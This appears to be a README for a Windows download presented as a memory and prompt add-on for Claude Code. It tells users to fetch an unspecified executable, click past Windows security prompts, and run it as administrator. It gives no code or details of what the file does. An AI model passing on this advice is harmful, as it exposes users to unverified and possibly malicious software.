openclaw-claude-code-integration helps you use Claude Code with a memory system and a cleaner prompt setup. It is built for Windows users who want a simple way to run the app, keep context across tasks, and reduce repeated setup work.
Use it to:
- keep useful notes from past work
- organize prompt parts into a clear structure
- manage task flow with a cutoff or fail-safe step
- work with local storage for memory data
- support a smoother Claude Code setup on your PC
Use this page to download the app for Windows:
Visit the release page to download
After you open the page:
- Find the latest release
- Look for the Windows file
- Download the file to your computer
- Open the downloaded file to start the app
If Windows asks for permission:
- Click Allow or Yes
- Wait for the setup or app window to open
- Follow the on-screen steps
Use a Windows PC with:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- 500 MB of free disk space
- Internet access for the first download and setup
- A modern browser if the release page opens in your browser
For best results:
- use a mouse and keyboard
- keep Windows updated
- close large apps if your PC feels slow
Follow these steps after you download the app:
- Open the downloaded file
- Wait for Windows to check the file
- If you see an install window, pick the default options
- If the app opens right away, let it finish loading
- Sign in or connect Claude Code if the app asks for it
- Choose a folder for memory or data files if prompted
- Keep the default prompt layout on your first run
- Finish the setup and let the app start
If the app creates a data folder, leave it in place. That folder stores memory, settings, and task history.
The memory system stores useful work notes so the app can keep context. This helps the app remember past tasks, project details, and repeated instructions.
The prompt setup breaks your instructions into clear parts. This makes it easier to reuse steps and keep your workflow tidy.
The app includes a stop or fail-safe layer. It helps limit bad runs, broken loops, and actions that should not continue forever.
The app uses local storage for memory data. This keeps your notes and task context in one place on your computer.
The app works with Claude Code so you can move between prompts, tasks, and memory with less manual setup.
- Download the release from the page above
- Open the file you downloaded
- If Windows shows a security prompt, choose the option that lets you continue
- If the app installs, finish the install
- Start the app from the Start menu or from the folder where you saved it
- Wait for the main window to appear
- Load your first prompt or task
- Save your memory data before you close the app
Use a simple folder layout like this:
Documents\OpenClawfor app dataDocuments\OpenClaw\memoryfor saved notesDocuments\OpenClaw\projectsfor task filesDocuments\OpenClaw\logsfor error logs
A clear folder layout helps you find files later and keeps your setup easy to manage.
Use the app in this order:
- Open the app
- Load or create a task
- Add key facts you want the app to remember
- Choose the prompt part you need
- Run the task with Claude Code
- Review the output
- Save any useful memory items
- Repeat for the next task
If you work on the same project each day, keep one memory file for that project. That makes it easier to find old notes and reuse them.
A simple first use case is a small project with repeated steps, such as:
- writing task notes
- tracking project details
- keeping prompt templates in one place
- saving results from past runs
- reducing repeated setup each time you work
This app fits users who want less manual work and a more stable flow when using Claude Code.
If the app does not open:
- download the file again
- make sure the download finished
- right-click the file and choose Open
- check whether Windows blocked the file
- try running it as an administrator
If the app opens but looks empty:
- check that your memory folder exists
- confirm that the app can write files
- reload the task or prompt
- restart the app
If the app seems slow:
- close other large apps
- restart Windows
- free up disk space
- keep only the files you need in the app folder
If Claude Code does not connect:
- check your internet connection
- confirm your Claude Code setup is ready
- reopen the app
- try the setup step again
This app is built to make Claude Code work feel more organized. It gives you a place for memory, prompt layout, and run control. That helps you keep your work in order without managing every piece by hand
